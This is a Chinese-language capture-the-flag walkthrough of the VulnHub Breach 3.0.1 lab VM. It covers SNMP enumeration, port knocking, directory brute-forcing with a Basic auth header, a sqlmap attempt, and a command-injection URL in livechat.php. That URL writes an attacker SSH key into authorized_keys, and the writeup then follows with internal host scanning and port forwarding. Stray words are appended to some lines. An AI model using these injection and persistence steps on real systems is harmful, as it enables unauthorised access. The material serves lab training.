本篇文章僅用於技術交流學習和研究的目的,嚴禁使用文章中的技術用於非法目的和破壞,不然形成一切後果與發表本文章的做者無關php
靶機下載以後使用僅主機模式加載到本地VMware Workstation工做站,須要發現目標靶機的IP地址,可使用nmap,netdiscover,或者arp之類的工具 arp-scan 例如:sudo arp-scan -I eth1 -l 固然也是可使用Windows環境下mac地址掃描工具都是能夠的,那麼本次演示就是arp-scan工具發現html
地址:https://www.vulnhub.com/entry/breach-301,177/mysql
剛開始使用nmap進行掃描沒有結果,默認我都是掃描tcp的,什麼都沒有掃描出來git
因而再從新掃描下udp端口,發現開放了161的udp端口,使用下面命令進行測試github
snmpwalk -Os -c public -v 1 192.168.56.104web
根據網上信息的提示,確認目標靶機開了knock ,須要敲擊的端口是根據這個信息 獲取 iso.3.6.1.2.1.1.4.0 = STRING: "Email: Milton@breach.local - (545)-232-1876"sql
端口分別爲545 232 1876shell
使用 knock -v 192.168.56.104 545 232 1876 多敲擊幾回看看,再次使用nmap掃描,發現開放了8端口安全
訪問是個401認證的web界面微信
這裏有一個疑問,一個是須要再次敲擊 knock -v 192.168.56.104 555 423 1800 就會開放22端口
這裏給出的帳號和密碼是milton/thelaststraw 獲得的密碼信息是根據這個靶機系列的第一個靶機"Breach 1"信息得到的,登陸成以後顯示以下信息:
看到有一個鏈接place 點進去看看
發現是個登陸界面 http://192.168.56.104:8/breach3/index.php ,試了下弱口令無果,那麼嘗試下目標猜解,在猜解以前由於是帶401認證的,因此咱們先使用burp抓包把401認證的base64編碼信息拿過來
須要猜解得目錄是 http://192.168.56.104:8/breach3/
dirb http://192.168.56.104:8/breach3/ -w -H "Authorization: Basic bWlsdG9uOnRoZWxhc3RzdHJhdw==" | tee dirb_192.168.56.104_breach3.txt
根據猜解得新得到了目錄blog
右鍵查看當前頁面的源代碼,發現電子郵件
那麼這個時候就知道目標靶機存在一個用戶名爲samir,繼續使用dirb命令加載大字典進行猜解,同時增長猜解範圍
dirb http://192.168.56.104:8/breach3/ -w -H "Authorization: Basic bWlsdG9uOnRoZWxhc3RzdHJhdw==" /usr/share/wordlists/dirb/big.txt -X .php,.bak,.html,.txt| tee dirb_192.168.56.104_breach3_big.txt
沒看到太多有價值的信息,那麼咱們繼續回到剛得到登陸窗口 http://192.168.56.104:8/breach3/index.php ,剛開始測試的思路就是試下弱口令不行,那麼此次試試有沒有SQL注入
經過burp抓登陸請求包,而後使用sqlmap進行注入
sqlmap -r bmfx_breach3.txt --auth-type=Basic --auth-cred=milton:thelaststraw --proxy=http://192.168.56.1:8080 --tamper=equaltolike --level=5 --risk=3 --dbms=mysql --dbs
上面測試並未成功,可是通過https://mrh4sh.github.io/breach-3-solution 提示,確認存在一個代碼執行的漏洞,那麼能夠直接寫入一個ssh公鑰過去直接鏈接,事先將公鑰進行base64編碼
執行下面3步操做
http://192.168.56.104:8/breach3/thebobscloudhostingllc/livechat.php?searcher=echo "c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCZ1FDL2l6L04yVmN5UUpHblBoTjhjRWZtVkZEdC9JTVRLajhHV2JFQVlBaGV4K2hBZE53RGYyMSs5dUNKWjRvaE5JeXpTK0syMTk2TVVlSW91aHBwd0tWZ0poSHVCc2QwZnV1QUF6bUtKbGlQZjUyQk9Gb0hZcmg2bUpxZm1mVk1oZzVQUUhXTWV4cldia2krUTRwREhKM1VpaWtwenhxWkFFZHJZUlZnOGZaYUtFY2ZoMG50aXdja0NKbWFLV1c2Y2hQWGRiOTdLYnE0bVlnZzRwamxjeGtJQ3VYTWRtSnh1TW9mRUdaTW0wUEhWSU1rb2hKRzl3NjJCZlY1d2M0MStyZ0E2TWczYnRHM1BPcDcyNUxPbmduQ0JlV3VUaE1CZ0o2ZlVNZER2cldaSEdQd3ovSjE0MUM2OGFpS2Zsa2M3NXA3QWwvMHUxVERtSitvdG5Fc3pDYlF4cTFVakhlVVhOaTZKSGFZdzdEQ2h2MVhwM05vY0EwK1FpTWhpdDdoYzNoS24zMjh3L1BtR09SclhuaG9EMHRETi9VSXFmNmNMOS9lOWlJcEQyNDdML2dvNlVqWlVybURKVDFJZjRXajVUa09UVU9tZWJVc1JQS2paZWRIc3BaSkFLK2JaYnppdW11dUNzMGpwUHNRRk56N1hDWHZFc2Nra0I3RktRdTZCTGM9IGthbGlAa2FsaQ==" | base64 -d > /home/thebobs/.ssh/authorized_keys
http://192.168.56.104:8/breach3/thebobscloudhostingllc/livechat.php?searcher=sudo%20-u%20thebobs%20chmod%20700%20/home/thebobs/.ssh/
http://192.168.56.104:8/breach3/thebobscloudhostingllc/livechat.php?searcher=sudo%20-u%20thebobs%20chmod%20600%20/home/thebobs/.ssh/authorized_keys
確保文件寫入成功,保證.ssh目錄權限是700,裏面的文件authorized_keys權限是600便可遠程鏈接,開始鏈接
發現鏈接成功是直接進入Python環境,那麼咱們經過Python環境生成一個shell
使用ifconfig命令看看IP網絡信息
而後發現存在虛擬機,網段是122的,那麼使用for循環掃描看看
for i in $(seq 2 254); do ping -c 1 192.168.122.$i -W 1| grep "bytes from "; done
確認存活兩臺主機,IP地址分別爲192.168.122.28和192.168.122.65 ,想對這兩臺虛擬機進行掃描,試試目標靶機是否存在namp命令,直接指向一下發現是存在的,那麼咱們直接使用nmap命令進行掃描
最終的掃描結果以下:
確認目標192.168.122.65開放了22,80,8800端口,根據掃描結果發現,開放的8800端口有401認證,80端口顯示是Apache,那麼能夠確認這又是個web應用,那麼咱們須要對其進行測試,可是由於這是目標靶機裏面的虛擬機,爲了訪問方便,我使用ssh進行進行端口轉發。
先把裏面的80端口轉發出來
ssh -L 8080:192.168.122.65:80 thebobs@192.168.56.104
執行了上面的端口轉發,發現沒效果,並且經過root權限,進入查看監聽端口也沒有開啓。這個靶機先放着吧,感受靶機自己問題比較多,前面剛開始的knock也是存在問題,不關咋knock8端口都不開放,仍是經過單用戶模式進入到目標靶機停掉knock服務,而後執行防火牆腳本纔起來的,你們有興趣看看這邊博客的演示:https://mrh4sh.github.io/breach-3-solution
本文分享自微信公衆號 - 白帽安全技術復現(baimaofuxian)。
若有侵權,請聯繫 support@oschina.cn 刪除。
本文參與「OSC源創計劃」,歡迎正在閱讀的你也加入,一塊兒分享。